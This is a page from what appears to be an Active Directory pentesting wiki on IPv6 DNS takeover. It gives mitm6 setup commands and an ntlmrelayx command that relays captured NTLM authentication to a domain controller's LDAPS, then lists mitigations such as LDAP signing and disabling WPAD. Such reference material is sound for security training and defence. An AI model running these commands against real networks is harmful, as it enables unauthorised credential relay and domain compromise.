📄
Bufu-Sec Wiki
GithubTwitter
  • Bufu-Sec Wiki
  • Active Directory
    • General
      • General
      • Installation
      • DNS
      • Kerberos
      • Kerberos Delegation
    • Enumeration
      • AD Module
      • Bloodhound
      • PowerShell Cheatsheet
      • PowerView Cheatsheet
      • Users
      • Groups
      • Computers
      • OUs
      • GPOs
      • ACLs
      • Domains
      • Trusts
      • Forest Mappings
      • Files and Shares
      • Kerbrute
    • Privilege Escalation
      • Kerberoasting
      • AS-REP Roasting
      • Constrained Delegation
      • Unconstrained Delegation
      • DNS Admins
    • Lateral Movement
      • PS Remoting
      • Credential Dumping
      • DC Sync
      • Overpass the Hash
      • Ticket Harvesting
      • Pass the Ticket
    • Persistence
      • Golden Tickets
      • Silver Tickets
      • ACL Attacks
      • Custom SSPs
      • DC Shadow
      • Skeleton Key
      • DSRM
    • Trust Attacks
      • Cross Domain Attacks
      • Cross Forest Attacks
      • MSSQL Servers
    • MITM & Relay Attacks
      • LLMNR Poisoning
      • SMB Relay
      • IPv6 Attacks
    • Detection & Defense
      • Domain Admins
      • Architectural Changes
      • Microsoft ATA
Powered by GitBook
On this page
  • Overview
  • Exploitation
  • Set Up mitm6
  • IPv6 DNS Takeover via mitm6
  • Mitigation
  1. Active Directory
  2. MITM & Relay Attacks

IPv6 Attacks

Overview

  • If both IPv4 and IPv6 are enabled and v4 is the main protocol, DNS for v6 is not configured

  • Attacker can impersonate IPv6 DNS server

  • Capture authentication requests to DC via LDAP or SMB

  • LDAP relay via NTLM

Exploitation

Set Up mitm6

git clone https://github.com/fox-it/mitm6 /opt/mitm6
cd /opt/mitm6
pip3 install -r requirements.txt
python3 setup.py install

IPv6 DNS Takeover via mitm6

# Run mitm6
mitm6 -d domain.local

# Set up relay against DC
ntlmrelayx.py -6 -t ldaps://192.168.31.10 -wh fakepad.marvel.local -l lootme

Mitigation

  • Block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy

  • Disable WPAD if it's not used via Group Policy

  • Enable LDAP signing and LDAP channel binding

  • Add Administrative users to the Protected Users group or marking them as sensitive and cannot be delegated to prevent impersonation of that user via delegation

PreviousSMB RelayNextDetection & Defense

Last updated 2 years ago